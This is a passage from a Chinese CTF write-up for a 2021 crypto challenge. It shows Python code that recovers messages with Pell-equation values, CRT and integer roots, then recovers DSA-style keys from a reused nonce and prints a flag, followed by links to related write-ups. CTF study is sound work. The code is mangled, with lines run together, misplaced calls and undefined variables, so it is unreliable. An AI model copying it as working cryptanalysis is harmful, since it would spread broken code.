187705159843973102963593151204361139335048329243
R2, S3=620827881415493136309071302986914844220776856282,
674735360250004315267988424435741132047607535029
for i in range(3):a1,a2=pell(WI[i])t1=[a1]t2=[a2]tx=a1ty=a2for j in range(25):tx,ty=tx*a1+wl[i]*ty*a2,tx*a2+ty*a1t1.append(tx)t2.append(ty)xl.append(t1)xl.append(t2)
c1= [285258922377992879626654060042167879088906728491168257892421618605259039359564
5322161563386615512475256726384365091711034449682791268994623758937752874750918
2009618889970824771008110257218987207836668686234982462196772211062276608955190
58631965055790709130207760704,
2111584990618013965631066460745842563767052008198324825898416602622289875350500
8904136688820075720411004158264138659762101873588583686473388951744733936769732
617279649797085152057880233721961,
3018991790921859647858477051669501812556772722943778230450112050353184634966827
8828965117763534189430853778744914819958349011705952697175980442697794795272126
6880757177055335088777693134693713345640206540670123872210178680306100865355059
146219281124303460105424]
c2= [148052450029409767056623510365366602228778431569288407577131980435074529632715
0149711334526260212269446322824793123786673537921171334520699723341693868372272
8592401118703567187475890102871950516388778938283577066421804574346522278885925
8272826217869877607314144,
1643631850318055151946938381389671039738824953272816402371095118047179758846703
0709318502386682626254448265648334522948071105444415378301997520500406974409481
46092723713661125309994275256,
1094958701601679594044597619846014925814463536699645559860524474354072876463594
7061037779912661207322820180541114179612916018317600403816027703391110922112311
9109000344423403873040067615897089438143963031830858583569615372791631753848480
10568152485779372842]
for b1 in range(25):for b2 in range(25):
• for b3 in range(25):
• rx=[xl[0][b1],xl[1][b2],xl[2][b3]]
• if CRT(rx,c1) and iroot(CRT(rx,c1),7)[1]==True: • print(iroot(CRT(rx,c1),7)[0])
同样的⽅法求得m2
#m1=838290559066247866659511413692971370713213136172089233104843727482852922670
4174
#m2=103368524056304889441983475774752666932349603981378500453989906291165448639
21454
m1=long_to_bytes(m1)
m2=long_to_bytes(m2)
h1=bytes_to_long(SHA.new(m1)).digest()
h2=bytes_to_long(SHA.new(m2)).digest()
n=85198615386075607567070020969981777827671873654631200472078241980737834438897
9001462488402791911391564165371083996828743706298882073345062370400178383135589
1127507390414845154025570581847758118286626941301826307985868022164734168076298
9080418039972704759003343616652475438155806858735982352930771244880990190318526
933267455248913782297991685041187565140859
d=10623995021320631630168390754576391633605524395570621094473647242596520010346
1421781804731678430116333702099777855279469137219165293725500887590280355973107
5807452123689375140700599918489480317182538046946218217349576048381252109517115
27151265000736896607029198
t=60132176395922896902518845244051065417143507550519860211077965501783315971109
4335444824112082384851355540652418649563616768782203425002080110893837512254374
1704989372554617679941718887597267729368003300539988311353119370535340489214181
1493415079755456185858889801456386910892239869732805273879281094613329645326287
205736614546311143635580051444446576104548
q=iroot(n//d)[0] P=n//q G=invert(t,n) K=invert(s1-s2,q)*(h1-h2)%q
X1=invert(r1,q)*(k*s1-h1)%q
X2=(s3*k-h1)*invert(r2,q)%q
print(long_to_bytes(X1))
print(long_to_bytes(X2))
DASCTF{f11bad18f529750fe52c56eed85d001b}
作者:light1ng小伙伴
2021西湖论剑wp相关推荐
- 2021 西湖论剑 pwn blind
利用ret2csu,覆盖alarm的got表最低一字节,通过爆破劫持alarm为syscall. 通过read函数的返回值让rax为0x5b,执行execve("/bin/sh", ...
- WP-2021西湖论剑
2021西湖论剑-wp 前言 全靠大佬打,我是划水的. 灏妹的web 页面开发中 Dirsearch扫一下,idea泄露 ezupload 查看页面源代码,发现提示 ?source=1 发现使用_FI ...
- 2023西湖论剑——misc——MP3
西湖论剑--misc--MP3 附件下载 链接:https://pan.baidu.com/s/1A-QFz3qC4Q2mSdZKBYqZNw 提取码:lulu MP3详解 这个应该是2023年这一届 ...
- 2022西湖论剑-初赛CTF部分wp-Zodiac
2022西湖论剑-初赛CTF部分wp-Zodiac 文章目录 2022西湖论剑-初赛CTF部分wp-Zodiac WEB real_ez_node 扭转乾坤 Node Magical Login PW ...
- 2023西湖论剑wirteup
2023西湖论剑wirteup 文章目录 2023西湖论剑wirteup 机你太美 take_the_zip_easy mp3 Isolated Machine Memory Analysis 前言: ...
- 2019西湖论剑·网络安全大会开幕 安全赋能数字新时代...
2019年4月20日-21日,以"安全:赋能数字新时代"为主题的2019西湖论剑•网络安全大会(以下简称"西湖论剑")在杭州国际博览中心举行.西湖论剑自2012 ...
- 2019西湖论剑·网络安全大会开幕 安全赋能数字新时代
2019年4月20日-21日,以"安全:赋能数字新时代"为主题的2019西湖论剑•网络安全大会(以下简称"西湖论剑")在杭州国际博览中心举行.西湖论剑自2012 ...
- 远禾科技出席阿里ASRC生态大会 并参与安恒西湖论剑...
近日,由阿里安全响应中心举办的2019 ASRC生态大会与安恒承办的2019西湖论剑·网络安全大会在互联网之都杭州成功召开,作为网络安全行业的两大盛会,得到了协会领导.业界权威.行业大咖.领导品牌.企 ...
- 远禾科技出席阿里ASRC生态大会 并参与安恒西湖论剑
近日,由阿里安全响应中心举办的2019 ASRC生态大会与安恒承办的2019西湖论剑·网络安全大会在互联网之都杭州成功召开,作为网络安全行业的两大盛会,得到了协会领导.业界权威.行业大咖.领导品牌.企 ...
最新文章
- R语言广义线性模型Logistic回归模型C Statistics计算
- python las转txt
- Spring Aop实例之xml配置
- 使用Python和Pandas的最简单的数据清理方法
- Another kind of Fibonacci
- NodeJs 在window中安装使用
- mysql添加字段时定义候选键_MySQL 表约束
- 理解lambda在linq中的应用
- 【Spring】spring depend-on 到底是干什么的?
- 关于 JQuery 的克隆
- Delphi实现点击按钮触发选择项, 进而实现不同的分支功能
- VGG Loss的Pytorch实现
- 字符串专题 【2008】四1 C++版
- 花钱购买C语言教程,秘籍:小白从零开始玩转C语言教程,足足300集
- 基于MATLAB的PID控制器设计
- 【Python密度泛函理论】
- 更改计算机bios密码怎么办,计算机BIOS通用密码的修改
- 恶作剧:被乔布斯整蛊也很快乐
- OpenCV判断图片是否是黑白图片
- 听Nicholas讲课的一些感想